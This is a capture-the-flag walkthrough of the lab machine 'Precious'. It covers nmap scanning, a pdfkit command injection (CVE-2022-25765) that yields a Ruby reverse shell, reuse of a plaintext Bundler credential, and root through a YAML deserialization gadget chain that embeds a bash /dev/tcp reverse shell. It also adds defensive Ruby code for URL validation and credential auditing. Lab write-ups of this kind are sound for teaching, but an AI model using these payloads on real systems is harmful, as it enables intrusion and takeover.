Precious machine

Information gathering

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.129
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 10:32 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:2F:D8:2A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds

Only two ports are open: 22 and 80.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.1.1.129
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 10:33 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00041s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b1:54:4d:49:a6:1c:09:a4:ac:20:ea:15:6d:f4:9e:7b (RSA)
| 256 43:3c:c8:cd:0e:bc:d8:d1:92:c4:1a:40:4c:5e:3e:93 (ECDSA)
|_ 256 6c:6d:c7:c8:4c:3b:01:b5:ea:59:bb:da:7f:fd:bb:c5 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
MAC Address: 00:0C:29:2F:D8:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (98%), Linux 5.0 - 5.4 (97%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 5.4 (96%), Linux 2.6.32 (96%), Linux 5.3 - 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.43 seconds

Port 80 redirects to precious.htb. Add a mapping from that hostname to the IP address in /etc/hosts, then open it in the browser. First, a look at the UDP scan results.

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.129
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 10:33 EDT
Nmap scan report for 192.1.1.129
Host is up (0.0025s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:2F:D8:2A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 27.71 seconds

Almost everything is closed. Next, run nmap's vuln scripts against the two open ports.

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nmap --script=vuln -p22,80 192.1.1.129
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 10:38 EDT
Nmap scan report for precious.htb (192.1.1.129)
Host is up (0.00032s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=precious.htb
| Found the following possible CSRF vulnerabilities:
|
| Path: http://precious.htb:80/
| Form id:
|_ Form action: /
MAC Address: 00:0C:29:2F:D8:2A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 73.89 seconds

Looking at the web service

Open precious.htb.

It is an online service that converts a web page into a PDF. Try feeding it https://www.baidu.com and http://precious.htb in turn.

We get a PDF back; it doesn't look like it contains anything useful.

pdfkit vulnerability

Download it locally and inspect it.

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ ls
id23dsowsjm4unj3et1rtntqcdii70py.pdf

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ file id23dsowsjm4unj3et1rtntqcdii70py.pdf
id23dsowsjm4unj3et1rtntqcdii70py.pdf: PDF document, version 1.4, 1 pages

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ exiftool id23dsowsjm4unj3et1rtntqcdii70py.pdf
ExifTool Version Number : 12.57
File Name : id23dsowsjm4unj3et1rtntqcdii70py.pdf
Directory : .
File Size : 24 kB
File Modification Date/Time : 2023:06:30 10:36:14-04:00
File Access Date/Time : 2023:06:30 10:36:42-04:00
File Inode Change Date/Time : 2023:06:30 10:36:14-04:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Creator : Generated by pdfkit v0.8.6

The PDF was generated by pdfkit. That might be the way in; let's check whether it has any known vulnerabilities.

┌──(kali㉿kali)-[~]
└─$ searchsploit pdfkit
---------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------- ---------------------------------
pdfkit v0.8.7.2 - Command Injection | ruby/local/51293.py
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is indeed an exploit script, and the affected version it lists is even newer than the one on the target. Copy it locally and see how to run it.

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ searchsploit -m 51293
Exploit: pdfkit v0.8.7.2 - Command Injection
URL: https://www.exploit-db.com/exploits/51293
Path: /usr/share/exploitdb/exploits/ruby/local/51293.py
Codes: CVE-2022–25765
Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Downloads/precious/51293.py

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ python3 51293.py -h
UNICORD Exploit for CVE-2022–25765 (pdfkit) - Command Injection

Usage:
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h

Options:
-c Custom command mode. Provide command to generate custom payload with.
-s Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
-w URL of website running vulnerable pdfkit. (Optional)
-p POST parameter on website running vulnerable pdfkit. (Optional)
-h Show this help menu.

The help text shows a reverse shell mode. Start a listener beforehand, then try to get a reverse shell. Note that the POST form parameter here is named url.

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ python3 51293.py -s 192.1.1.128 443 -w http://precious.htb/ -p url

_ __,~~~/_ __ ___ _______________ ___ ___
,~~`( )_( )-\| / / / / |/ / _/ ___/ __ \/ _ \/ _ \
|/| `--. / /_/ / // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....

UNICORD: Exploit for CVE-2022–25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Sent to Target Website Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.1.1.128","443"))'`
LOCALIP: 192.1.1.128:443
WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 443".
WEBSITE: http://precious.htb/
POSTARG: url
EXPLOIT: Payload sent to website!
SUCCESS: Exploit performed action.
┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.129] 41312
whoami
ruby
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:2f:d8:2a brd ff:ff:ff:ff:ff:ff
inet 192.1.1.129/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 937sec preferred_lft 937sec
inet6 fe80::20c:29ff:fe2f:d82a/64 scope link
valid_lft forever preferred_lft forever
uname -a
Linux precious 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
which python
which python2
which python3
/usr/bin/python3
python3 -c "import pty;pty.spawn('/bin/bash')"
ruby@precious:/var/www/pdfapp$
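From the defender's side, the root of CVE-2022-25765 is that the user-supplied url field reaches wkhtmltopdf without strict validation, so a value shaped like http://%20 followed by backticks is interpreted by a shell. Below is an added example (not code from the box, from pdfkit, or from the exploit author): a hypothetical allowlist check an application could apply to the form field before calling pdfkit, plus a convert_command helper that hands the URL to wkhtmltopdf as an argv array so no shell is ever involved. The payload shape used in the demo is a shortened, constructed version of the one printed above.

```ruby
require "uri"

# Added example, not code from the Precious box or from pdfkit itself.
# safe_url? is an application-level allowlist for a user-supplied URL that
# will be passed to wkhtmltopdf; convert_command builds the command as an
# argv array, which system(*argv) / IO.popen(argv) run without /bin/sh.

ALLOWED_SCHEMES = %w[http https].freeze

# Characters RFC 3986 permits anywhere in a URL. Space, backtick, quotes,
# angle brackets and friends are not in this set and are rejected outright.
RFC3986_CHARS = %r{\A[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]*\z}

# Even inside the RFC 3986 set, "$" (as in $(...) or ${...}) is shell
# syntax, so it is rejected too; "&" and ";" stay allowed for query strings.
SHELL_META = /[`$'"\\|<>\s]/

# Constructed, shortened shape of the injection payload (encoded space,
# then a backtick-quoted command). Used only to show the check rejecting it.
PAYLOAD_SHAPE = "http://%20`id`"

# Returns true only for an http(s) URL that consists solely of RFC 3986
# characters, contains no shell metacharacters and has a plain hostname.
def safe_url?(raw)
  return false unless raw.is_a?(String) && raw.size <= 2048
  return false unless raw.match?(RFC3986_CHARS)
  return false if raw.match?(SHELL_META)

  uri = URI.parse(raw)
  return false unless ALLOWED_SCHEMES.include?(uri.scheme)
  return false if uri.host.nil? || uri.host.empty?
  # Percent-encoded bytes in the host part are never legitimate here.
  return false if uri.host.match?(/%[0-9A-Fa-f]{2}/)

  true
rescue URI::InvalidURIError
  false
end

# Build the wkhtmltopdf invocation as an argument vector. Callers run it as
# system(*convert_command(url, out)) so the URL is one argv entry and is
# never re-parsed by a shell. Raises on anything safe_url? refuses.
def convert_command(url, output_path)
  raise ArgumentError, "rejected URL: #{url.inspect}" unless safe_url?(url)

  ["wkhtmltopdf", "--quiet", url, output_path]
end

if $PROGRAM_NAME == __FILE__
  ["https://www.baidu.com", "http://precious.htb/", PAYLOAD_SHAPE].each do |u|
    puts "#{safe_url?(u) ? 'accept' : 'reject'}  #{u}"
  end
end
```

The allowlist is deliberately stricter than RFC 3986 (it refuses "$" and whitespace, which rarely appear in legitimate page URLs); the second, independent layer is that the URL is passed as its own argv element, so even a character that slips through the first layer is never evaluated by a shell.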

The hidden .bundle file

After upgrading the shell, continue gathering information: first, which users exist?

ruby@precious:/var/www/pdfapp$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
gaoxiaodiao:x:1000:1000:gaoxiaodiao:/home/gaoxiaodiao:/bin/bash
ruby:x:1001:1001:,,,:/home/ruby:/bin/bash
henry:x:1002:1002:,,,:/home/henry:/bin/bash

More than expected. By the usual logic, we should switch to another user first and only then escalate to root. Keep gathering information; let's look in the home directory.

ruby@precious:~$ ls -liah
ls -liah
total 28K
393257 drwxr-xr-x 4 ruby ruby 4.0K Jun 12 04:23 .
393218 drwxr-xr-x 5 root root 4.0K Jun 12 04:23 ..
393274 lrwxrwxrwx 1 ruby ruby 9 Jun 12 04:23 .bash_history -> /dev/null
393258 -rw-r--r-- 1 ruby ruby 220 Jun 12 04:23 .bash_logout
393259 -rw-r--r-- 1 ruby ruby 3.7K Jun 12 04:23 .bashrc
393254 dr-xr-xr-x 2 ruby ruby 4.0K Jun 12 04:23 .bundle
393267 drwxr-xr-x 4 ruby ruby 4.0K Jun 30 14:35 .cache
393260 -rw-r--r-- 1 ruby ruby 807 Jun 12 04:23 .profile

The home directory contains two hidden directories. Let's look inside .bundle.

ruby@precious:~$ cd .bundle
cd .bundle
ruby@precious:~/.bundle$ ls -liah
ls -liah
total 12K
393254 dr-xr-xr-x 2 ruby ruby 4.0K Jun 12 04:23 .
393257 drwxr-xr-x 4 ruby ruby 4.0K Jun 12 04:23 ..
393266 -r-xr-xr-x 1 ruby ruby 62 Jun 12 04:23 config
ruby@precious:~/.bundle$ cat config
cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

Surprisingly, a username and password are right here. Let's log in over SSH.

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ ssh henry@192.1.1.129
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ED25519 key sent by the remote host is
SHA256:hhZ2PP71pBNZ2j6slM0FYVNYiySWo+MZtY1HNrglpHs.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:10
remove with:
ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.1.1.129"
Host key for 192.1.1.129 has changed and you have requested strict checking.
Host key verification failed.

A small hiccup: because this is a local lab, known_hosts already has a stale entry for this IP (from a different machine). Following the hint above, run ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.1.1.129" and the problem goes away.

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.1.1.129"
# Host 192.1.1.129 found: line 8
# Host 192.1.1.129 found: line 9
# Host 192.1.1.129 found: line 10
/home/kali/.ssh/known_hosts updated.
Original contents retained as /home/kali/.ssh/known_hosts.old
┌──(kali㉿kali)-[~/Downloads/precious]
└─$ ssh henry@192.1.1.129
The authenticity of host '192.1.1.129 (192.1.1.129)' can't be established.
ED25519 key fingerprint is SHA256:hhZ2PP71pBNZ2j6slM0FYVNYiySWo+MZtY1HNrglpHs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.129' (ED25519) to the list of known hosts.
Last login: Mon Jun 12 05:13:05 2023 from 192.168.42.1

henry@precious:~$ whoami
henry
henry@precious:~$ ls -liah
total 36K
393261 drwxr-xr-x 5 henry henry 4.0K Jun 12 05:10 .
393218 drwxr-xr-x 5 root root 4.0K Jun 12 04:23 ..
393279 lrwxrwxrwx 1 henry henry 9 Jun 12 04:23 .bash_history -> /dev/null
393262 -rw-r--r-- 1 henry henry 220 Jun 12 04:23 .bash_logout
393263 -rw-r--r-- 1 henry henry 3.9K Jun 12 05:07 .bashrc
393611 drwx------ 2 henry henry 4.0K Jun 12 05:08 .cache
393544 drwx------ 3 henry henry 4.0K Jun 12 04:56 .config
393275 drwxr-xr-x 3 henry henry 4.0K Jun 12 04:23 .local
393264 -rw-r--r-- 1 henry henry 807 Jun 12 04:23 .profile
393612 -rw-r----- 1 henry henry 536 Jun 12 05:01 user.txt
393615 lrwxrwxrwx 1 henry henry 9 Jun 12 05:10 .viminfo -> /dev/null

Privilege escalation

Found user.txt. Now check sudo -l.

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User henry may run the following commands on precious:
(root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

sudo -l actually turned something up. Let's look at that file.

henry@precious:~$ ls -liah /opt/update_dependencies.rb
210617 -rwxr-xr-x 1 root root 848 Jun 12 04:23 /opt/update_dependencies.rb
henry@precious:~$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
  YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
  Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
  gems_local.each do |local_name, local_version|
    if(file_name == local_name)
      if(file_version != local_version)
        puts "Installed version differs from the one specified in file: " + local_name
      else
        puts "Installed version is equals to the one specified in file: " + local_name
      end
    end
  end
end

It looks like I can run /opt/update_dependencies.rb with ruby via sudo without a password, and that script in turn loads a dependencies.yml file. From the file name it's evidently a script that checks dependencies and their versions. Let's google for an exploit, but first ask ChatGPT to fill in some background on this area.

That yields a keyword: package manager.

YAML deserialization

Googling for an exploit with the RubyGems keyword combined with yaml.

YAML deserialization: perhaps that's exactly what I need. Going through the results in order, the second link has the exploit: Blind Remote Code Execution through YAML Deserialization (stratumsecurity.com).

Change the reverse shell target address and port in it.

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/reverseshell.stratumsecurity.com/443 0>&1'"
         method_id: :resolve

After editing, save it as dependencies.yml under /tmp, start a listener on the attacking machine beforehand, then run the sudo command.

henry@precious:/tmp$ vim dependencies.yml
henry@precious:/tmp$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found

The reverse shell comes back. Grab the flag under /root, take the closing screenshot, and the box is done.

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.129] 53450
root@precious:/tmp# whoami
whoami
root
root@precious:/tmp# cd /root
cd /root
root@precious:~# cat root.txt
cat root.txt
root@precious:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:2f:d8:2a brd ff:ff:ff:ff:ff:ff
inet 192.1.1.129/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1429sec preferred_lft 1429sec
inet6 fe80::20c:29ff:fe2f:d82a/64 scope link
valid_lft forever preferred_lft forever
root@precious:~# uname -a
uname -a
Linux precious 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

Supplement

Why is there a username and password in the .bundle directory?

The config file in the .bundle folder under a user's home directory configures Bundler, a tool related to Gems. Bundler manages the dependencies of a Ruby application: it lets you specify the versions and sources of the Gems the application needs. The contents of this file are Bundler configuration. Specifically, BUNDLE_HTTPS://RUBYGEMS__ORG/ is an environment variable that tells Bundler which RubyGems source URL to use when downloading Gems. In this example the source URL is https://rubygems.org/, the official RubyGems source.

"henry:Q3c1AqGHtoI0aXAYFH" is a username and password combination used to authenticate to that RubyGems source: the username is "henry" and the password is "Q3c1AqGHtoI0aXAYFH". The point of this configuration is to let Bundler authenticate automatically when it fetches Gems from the source. Through the config file you can specify different sources and credentials to suit different development environments and needs. This makes collaborating in a team, or sharing a project across machines, more convenient, because everyone can use the same Bundler configuration to obtain the required Gems.
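Because Bundler keeps source credentials in that YAML file under keys shaped like BUNDLE_<SOURCE-URL>, a defender can audit home directories for them and report where plaintext source passwords live. The following is an added example (not part of this write-up and not Bundler's own code): it parses a config of the shape shown in the .bundle section with YAML.safe_load, recovers the source URL from the key (Bundler writes the host's dots as __), and returns each credential with the password masked. The sample config is constructed; the password in it is a placeholder, not the real one from the box.

```ruby
require "yaml"

# Added example, not code from the box or from Bundler: audit a Bundler
# config file for embedded source credentials and report them masked.
# Bundler stores per-source credentials under keys like
#   BUNDLE_HTTPS://RUBYGEMS__ORG/: "user:password"
# where "." in the host is written as "__".

# Constructed sample in the same shape as ~/.bundle/config on the box.
# The password values here are placeholders.
SAMPLE_CONFIG = <<~YAML
  ---
  BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:ExamplePassword123"
  BUNDLE_PATH: "vendor/bundle"
  BUNDLE_HTTPS://GEMS__EXAMPLE__COM/: "deploy:s3cret"
YAML

# A credential-bearing key names a source URL; its value is "user:password".
CRED_KEY = %r{\ABUNDLE_HTTPS?://}i
CRED_VALUE = /\A([^:\s]+):(\S+)\z/

# Reverse Bundler's key encoding: drop the BUNDLE_ prefix, turn "__" back
# into ".", and lowercase the upper-cased URL.
def bundler_source_key_to_url(key)
  key.sub(/\ABUNDLE_/, "").gsub("__", ".").downcase
end

# Returns one Hash per credential found: the source URL, the user name and
# the password length. The password itself is never returned.
def find_bundler_credentials(config_text)
  data = YAML.safe_load(config_text) || {}
  data.filter_map do |key, value|
    next unless key.to_s.match?(CRED_KEY) && value.is_a?(String)
    next unless (m = value.match(CRED_VALUE))

    { source: bundler_source_key_to_url(key.to_s), user: m[1], password_length: m[2].length }
  end
end

# Read every ~/.bundle/config under a home root (default /home) and report.
# Unreadable files are skipped, so this runs as an ordinary user too.
def audit_home_directories(home_root = "/home")
  Dir.glob(File.join(home_root, "*", ".bundle", "config")).flat_map do |path|
    find_bundler_credentials(File.read(path)).map { |c| c.merge(file: path) }
  rescue Errno::EACCES, Errno::ENOENT
    []
  end
end

if $PROGRAM_NAME == __FILE__
  find_bundler_credentials(SAMPLE_CONFIG).each do |c|
    puts "#{c[:source]} user=#{c[:user]} password=#{'*' * c[:password_length]}"
  end
end
```

The masked report is enough to act on: the remedy is to move the credential out of the file (Bundler also reads BUNDLE_* environment variables), rotate it, and check whether, as on this box, the same password was reused for the user's login.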


Precious machine
https://i3eg1nner.github.io/2023/07/1a202013a8c5.html
Author: I3eg1nner
Published: July 1, 2023